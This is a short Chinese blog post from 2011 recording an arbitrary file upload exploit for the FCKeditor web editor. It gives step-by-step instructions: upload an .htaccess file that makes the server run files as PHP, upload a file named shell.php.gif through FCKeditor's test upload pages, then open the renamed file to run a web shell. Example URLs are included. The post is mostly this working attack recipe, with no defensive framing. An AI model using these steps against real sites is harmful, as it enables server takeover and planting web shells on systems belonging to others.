FCKeditor全部版本上传漏洞

2011.08.31 杂乱无章 238 阅读 2 评论 659 字

记录下也许哪天还找这个呢!
FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:

SetHandler application/x-httpd-php

2.实用编辑器上传htaccess文件.
http://www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html
http://www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.badguest.cn/上传目录/shell_php.gif

本文著作权归作者 [  ] 享有,未经作者书面授权,禁止转载,封面图片来源于 [ 互联网 ] ,本文仅供个人学习、研究和欣赏使用。如有异议,请联系博主及时处理。
漏洞

发表留言

读者留言2

  1. 不懂诶。 :|

    1. 利用伪静态。

END
首页相册档案 主题
Copyright©2008-2025  All Rights Reserved.  Load:0.031 s
Designed by OneBlog V3.5
护眼模式